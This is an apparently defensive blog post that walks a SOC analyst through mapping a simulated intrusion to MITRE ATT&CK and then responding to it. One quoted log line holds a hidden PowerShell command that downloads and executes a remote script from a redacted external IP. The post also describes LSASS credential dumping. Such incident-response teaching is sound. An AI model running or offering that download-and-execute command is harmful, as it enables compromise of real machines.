In Part 1, we learned that the MITRE ATT&CK matrix is the periodic table of hacker behavior. Now, it is time to put it to the test. Let’s walk through a live Tier-3 escalation and map a complex cyber attack in real-time.

Understanding the theory of MITRE Tactics and Techniques is great for passing a certification exam. But when it’s 3:00 AM and your Next-Gen SIEM is screaming about a multi-stage intrusion on your company’s production network, theory doesn’t matter. Execution does.
My job isn’t just to look at an alert and click “resolve.” My job is to translate technical gibberish into a cohesive battle plan.
Today, we are going to look at a single, complex alert. We will break down the raw logs, map them directly to the MITRE ATT&CK matrix, and use that framework to predict the hacker’s next move before they make it.
The Scenario: The Midnight Intrusion
You are monitoring the XDR dashboard when a critical, multi-stage alert fires on a public-facing web server (SRV-WEB-01). Instead of a single isolated event, the SIEM has correlated three distinct, suspicious activities happening within seconds of each other. Here is the raw data your Level 1 analyst escalates to you:
Raw Log 1 (Process Creation – Event ID 4688):
Process: powershell.exeCommand Line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command"IEX (New-Object Net.WebClient).DownloadString('http://103.x.x.x/payload.ps1')"
Raw Log 2 (Process Access – Event ID 4656):
Target Process: lsass.exeSource Process: payload.exeAccess Mask: 0x1410 (PROCESS_VM_READ)
Raw Log 3 (Network Traffic – Firewall Log):
Source: SRV-WEB-01Destination: SRV-DB-01 (Internal Database Server)Port: 3389 (RDP)Status: Connection Established
To an untrained eye, this is just a sequence of messy logs. Let’s use the MITRE framework to translate this into a story
Phase 1: Dissecting and Mapping the Attack
We take each raw log and map it to a Tactic (The Goal) and a Technique (The Method).
Log 1 Mapping: The Foothold
The attacker is using a hidden PowerShell window to download a script from an external IP address.
- Tactic: Execution (TA0002) – The attacker is trying to run malicious code.
- Technique: Command and Scripting Interpreter: PowerShell (T1059.001) – They are leveraging native Windows tools to execute the code.
Log 2 Mapping: The Theft

The downloaded payload.exe is requesting “Read” access to the memory of lsass.exe (Local Security Authority Subsystem Service). LSASS is the Windows process that stores user passwords and Kerberos tickets in memory.
- Tactic: Credential Access (TA0006) – The attacker wants administrative passwords.
- Technique: OS Credential Dumping: LSASS Memory (T1003.001) – The procedure here is almost certainly the execution of Mimikatz or a similar memory-scraping tool.
Log 3 Mapping: The Spread
Immediately after dumping passwords from memory, the web server initiates a Remote Desktop (RDP) connection to your internal database server.
- Tactic: Lateral Movement (TA0008) – The attacker is navigating through the environment.
- Technique: Remote Services: Remote Desktop Protocol (T1021.001) – They are using the stolen credentials to log into the database server via native RDP, blending in with normal admin traffic.
Phase 2: The Tier-3 Pivot (Predicting the Next Move)
This is where the MITRE framework elevates you from a reactive analyst to a proactive threat hunter.
We have mapped the attacker’s path: Execution (TA0002) ➔ Credential Access (TA0006) ➔ Lateral Movement (TA0008).
They are now sitting on SRV-DB-01, your internal database server. What is their next move?
Consulting the MITRE matrix, we know that once an attacker compromises a database server, their Tactics narrow significantly. They aren’t going to try to gain “Initial Access” again. Their next logical Tactic is either:
- Collection (TA0009): Gathering the sensitive data from the SQL database.
- Exfiltration (TA0010): Smuggling that data out of your network via encrypted channels.
- Impact (TA0040): Deploying Ransomware to encrypt the database and hold the company hostage.
The Counter-Attack: Because we know exactly what they want to do next, we don’t wait for the Exfiltration alert to fire. We act immediately:
- Containment: We instantly isolate
SRV-WEB-01andSRV-DB-01via our XDR platform, severing their RDP connection. - Eradication: We block the external IP (
103.x.x.x) at the perimeter firewall. - Remediation: Because we know OS Credential Dumping (T1003.001) occurred on the web server, we force a global password reset for any administrator who recently logged into that machine, neutralizing the stolen credentials.
The Takeaway
A SIEM gives you visibility. But visibility without context is just noise.
By utilizing the MITRE ATT&CK framework, we translated three disparate, cryptic log files into a clear, tactical narrative. We understood the attacker’s weapons (PowerShell, Mimikatz, RDP), understood their goals (Credentials, Lateral Movement), and predicted their endgame (Data Exfiltration/Ransomware) in time to stop it.
Tools don’t stop breaches. Highly trained engineers wielding the right frameworks do.
Stay vigilant, and happy hunting.
Leave a Reply